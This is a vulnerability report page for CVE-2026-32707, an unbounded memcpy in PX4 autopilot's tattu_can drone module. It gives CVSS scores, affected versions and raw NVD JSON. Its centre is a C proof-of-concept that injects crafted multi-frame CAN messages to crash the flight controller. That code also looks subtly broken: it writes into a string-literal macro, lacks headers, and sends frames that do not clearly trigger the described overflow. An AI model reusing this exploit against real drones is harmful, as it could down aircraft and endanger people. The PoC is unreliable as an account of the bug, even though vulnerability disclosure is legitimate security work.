Security Vulnerability Report
CVE-2026-32707 CVSS 5.2 MEDIUM

Published: 2026-03-16 14:19:42
Last Modified: 2026-03-17 16:16:23

Description

PX4 autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, tattu_can contains an unbounded memcpy in its multi-frame assembly loop, allowing stack memory overwrite when crafted CAN frames are processed. In deployments where tattu_can is enabled and running, a CAN-injection-capable attacker can trigger a crash (DoS) and memory corruption. This vulnerability is fixed in 1.17.0-rc2.

CVSS Details

CVSS Score: 5.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:* - VULNERABLE
PX4 Autopilot tattu_can < 1.17.0-rc2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2026-32707 PoC - CAN Frame Injection for PX4 tattu_can Stack Overflow
// This PoC demonstrates sending malformed multi-frame CAN messages
// to trigger unbounded memcpy in tattu_can module
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <linux/can.h>
#include <linux/can/raw.h>
#include <net/if.h>
#include <sys/socket.h>

#define CAN_INTERFACE "can0"
#define TATTU_CAN_ID 0x100
#define MALICIOUS_PAYLOAD_SIZE 256 // Exceeds stack buffer size

int create_can_socket(const char *interface) {
    int sock = socket(PF_CAN, SOCK_RAW, CAN_RAW);
    if (sock < 0) {
        perror("Socket creation failed");
        return -1;
    }
    struct ifreq ifr;
    strcpy(ifr.ifr_name, interface);
    ioctl(sock, SIOCGIFINDEX, &ifr);
    struct sockaddr_can addr;
    addr.can_family = AF_CAN;
    addr.can_ifindex = ifr.ifr_ifindex;
    if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("Bind failed");
        return -1;
    }
    return sock;
}

void send_malicious_multi_frame(int sock) {
    // First frame (FF) - indicates multi-frame message
    struct can_frame ff_frame;
    ff_frame.can_id = TATTU_CAN_ID | CAN_EFF_FLAG;
    ff_frame.can_dlc = 8;
    ff_frame.data[0] = 0x10; // First Frame Indicator + DLC
    memset(&ff_frame.data[1], 0x41, 7); // Padding
    // Send First Frame
    write(sock, &ff_frame, sizeof(struct can_frame));
    // Consecutive frames with oversized payload
    for (int i = 0; i < 20; i++) {
        struct can_frame cf_frame;
        cf_frame.can_id = TATTU_CAN_ID | CAN_EFF_FLAG;
        cf_frame.can_dlc = 8;
        cf_frame.data[0] = 0x20 | (i & 0x0F); // Consecutive Frame + Sequence
        // Fill with pattern to overflow stack buffer
        memset(&cf_frame.data[1], 0x41, 7);
        write(sock, &cf_frame, sizeof(struct can_frame));
        usleep(1000); // Small delay between frames
    }
    printf("[+] Malicious multi-frame CAN messages sent\n");
    printf("[+] Target: %s, ID: 0x%x\n", CAN_INTERFACE, TATTU_CAN_ID);
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        strncpy(CAN_INTERFACE, argv[1], IFNAMSIZ-1);
    }
    printf("[*] CVE-2026-32707 PoC - PX4 tattu_can Stack Overflow\n");
    printf("[*] Target: PX4 Autopilot < 1.17.0-rc2\n");
    int sock = create_can_socket(CAN_INTERFACE);
    if (sock < 0) {
        fprintf(stderr, "[-] Failed to create CAN socket\n");
        return 1;
    }
    send_malicious_multi_frame(sock);
    close(sock);
    return 0;
}

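References

https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-wxwm-xmx9-hr32 (Exploit, Vendor Advisory)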

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32707", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:41.783", "lastModified": "2026-03-17T16:16:23.027", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "PX4 autopilot is a flight control solution for drones. Prior to 1.17.0-rc2, tattu_can contains an unbounded memcpy in its multi-frame assembly loop, allowing stack memory overwrite when crafted CAN frames are processed. In deployments where tattu_can is enabled and running, a CAN-injection-capable attacker can trigger a crash (DoS) and memory corruption. This vulnerability is fixed in 1.17.0-rc2."}, {"lang": "es", "value": "El piloto automático PX4 es una solución de control de vuelo para drones. Antes de la versión 1.17.0-rc2, tattu_can contiene un memcpy sin límites en su bucle de ensamblaje de múltiples tramas, lo que permite la sobrescritura de memoria de pila cuando se procesan tramas CAN manipuladas. En implementaciones donde tattu_can está habilitado y en ejecución, un atacante capaz de inyectar CAN puede provocar un fallo (DoS) y corrupción de memoria. Esta vulnerabilidad está corregida en la versión 1.17.0-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 5.2, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.0", "matchCriteriaId": "2FC2D6F1-D77D-44C2-A99C-55CB5A4474B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "033A0A82-2986-44D5-A712-47B8D43407FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "3F2EA96E-BC3A-42AB-B81B-53D5872B2296"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:1.17.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "1EAC5320-8D94-477D-AB85-144F8218DDFB"}]}]}], "references": [{"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-wxwm-xmx9-hr32", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/PX4/PX4-Autopilot/security/advisories/GHSA-wxwm-xmx9-hr32", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}